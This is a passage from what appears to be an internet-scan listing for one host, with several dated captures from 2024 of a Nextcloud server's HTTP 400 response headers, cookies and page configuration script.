"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1729207307; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-10-15 22:06
HTTP/1.1 400 Bad Request Date: Tue, 15 Oct 2024 22:06:08 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=G8V1DYuTXeN1UQJPORPCjSbnmXsGuvLJw5dUr%2FW9L2VmEBlnxt8YcdAhwvQGnNZZEUyaqF3PQM2PFShp2Rp%2B2V2abz%2FrosDJx5ja%2FH%2FdocMgtsN72TJ3gc%2F7RRgxoKEv; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=ln0crbf5md5cej7o21d9jlh668; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="VzalBrhzeu3m94JfQnGWlximO2EpHoloZZTX4gj1mps=:NH32QowZQr2uptgRAByn23vFDyx9asMEHb+SgUyn768="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="VnphbEJyaHpldTNtOTRKZlFuR1dseGltTzJFcEhvbG9aWlRYNGdqMW1wcz06TkgzMlFvd1pRcjJ1cHRnUkFCeW4yM3ZGRHl4OWFzTUVIYitTZ1V5bjc2OD0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1729029968; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-10-01 22:19
HTTP/1.1 400 Bad Request Date: Tue, 01 Oct 2024 22:19:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=v6g6WkE%2FJBBzws3x24VnehyRy7yBDL1xEsqbEl5PrGADvsrb7oDP8Ilt0TdY5ipLUEgbDJQaO6cAfO6KhZ%2FqWfDG67U4Gj6e6oFzBF8SOUoZP2pnOhJsADnVtwGYHs9C; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=d0vmg3bvad436m4uphda93epf0; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="idE5MIPQ4jyOPEidc8sOWghZVcwZ5A30+nCqIsapvKc=:5bdeWvDnlFu6RS2lFoRgLlJtD612i3SZuRztRrOR+pI="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="aWRFNU1JUFE0anlPUEVpZGM4c09XZ2haVmN3WjVBMzArbkNxSXNhcHZLYz06NWJkZVd2RG5sRnU2UlMybEZvUmdMbEp0RDYxMmkzU1p1Unp0UnJPUitwST0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1727821178; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-09-29 21:27
HTTP/1.1 400 Bad Request Date: Sun, 29 Sep 2024 21:27:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=oE9lk4atEgsfCk4i8Kunr3iSQ3xnKHeonUfOgTfl2586eYcyWQCIGf%2BLy%2FHeu0%2Flabay5tC3%2F5ajmhP9QfN53%2BYDS8noVAojQ4rjcSH8R0dCRBHgoy48p3RzcPxXnXTs; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=2ihbg7rtu09c0ck4k0j3ss52ga; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="hrza1g+IyEIYS7VJKds6YhLXy4B9LvT/DG9V+BE2EvE=:vsaz5mHwngBVCs8KUJJOW2q64MVPF5LJfRs8giBxYog="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="aHJ6YTFnK0l5RUlZUzdWSktkczZZaExYeTRCOUx2VC9ERzlWK0JFMkV2RT06dnNhejVtSHduZ0JWQ3M4S1VKSk9XMnE2NE1WUEY1TEpmUnM4Z2lCeFlvZz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1727645239; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-09-27 21:59
HTTP/1.1 400 Bad Request Date: Fri, 27 Sep 2024 21:59:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=HqLNjFYc4UakfxJYRIRf85Lg0TimrP7qM7OZKBOTc6XBC%2Bb1KfqJ0hH%2FdEHwq5e3FzyzoIYbqp4zPwx4xtQSQlpxaQqkcdEtIo%2BB1CYw7AhIY5Jarr52FekHcrTtdmYr; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=i6tpn9gu78k8m4srr6slvgou0n; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="TsUJG23p9ZJg6yGBI2Dis+AgdZu3kb8XwRu3A8soFsU=:B5BgVxiCzccJuHX5SzWSgLMVTPrGuopa6kPUN4gDcJM="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="VHNVSkcyM3A5WkpnNnlHQkkyRGlzK0FnZFp1M2tiOFh3UnUzQThzb0ZzVT06QjVCZ1Z4aUN6Y2NKdUhYNVN6V1NnTE1WVFByR3VvcGE2a1BVTjRnRGNKTT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1727474390; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m